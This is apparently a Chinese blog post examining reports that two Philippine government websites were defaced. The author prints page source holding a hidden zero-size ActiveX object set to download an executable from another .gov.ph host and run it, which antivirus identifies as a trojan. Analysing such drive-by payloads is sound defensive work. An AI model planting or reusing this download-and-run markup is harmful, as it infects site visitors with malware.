也看菲律宾官网被黑

今天在QQ群里发现有人传http://www.pei.net.ph/和http://lamITan.gov.ph/  两个菲律宾官网被黑了,被挂上了中国国旗。首先,第一感觉,看到了很振奋。于是对Jason.Mr.X这个所谓的大牛膜拜之情由然而升。于是从网上查询他的信息,发现该消息已于是好几天前的旧闻了。

于是疑问顿生,虽然菲律宾国家本身很落后,不过一个国家的官方站点被黑了进一个星期左右都没被改过来,显然这有点说不通。接着ping了下这两个站点,通过得出的公网地址查询,发现http://lamITan.gov.ph/这个站点的公网IP显示的竟然是美国。一个国家政府的站点在别外一个国家架设,有点不和情理啊。

通过分析http://lamITan.gov.ph/这个站点的源代码,发现了这样一段代码。

<BODY><OBJECT ID=”*ActiveX1″ WIDTH=”0″ HEIGHT=”0″ CLASSID=”CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61″ CODEBASE=”*ActiveX.cab#Version=1,0,0,1″><PARAM NAME=”propProgressbackground” VALUE=”#bccee8″><PARAM NAME=”propTextbackground” VALUE=”#f7f8fc”><PARAM NAME=”propBarColor” VALUE=”#df0203″><PARAM NAME=”propTextColor” VALUE=”#000000″><PARAM NAME=”propWidth” VALUE=”0″><PARAM NAME=”propHeight” VALUE=”0″><PARAM NAME=”propDownloadUrl” VALUE=”http://www.sulu.gov.ph/admin/cal/135pk.exe”><PARAM NAME=”propPostdownloadAction” VALUE=”run”><PARAM NAME=”propInstallCompleteUrl” VALUE=””><PARAM NAME=”propbrowserRedirectUrl” VALUE=””><PARAM NAME=”propVerbose” VALUE=”0″><PARAM NAME=”propInterrupt” VALUE=”0″></OBJECT></script></body></html>

显然这是一段网马信息,下载http://www.sulu.gov.ph/admin/cal/135pk.exe这个文件,通过杀软查询,确实是这是一个木马无疑。而我在通过360浏览器下载时,就有云安全提示是木马文件。

 

发表评论

您的电子邮箱地址不会被公开。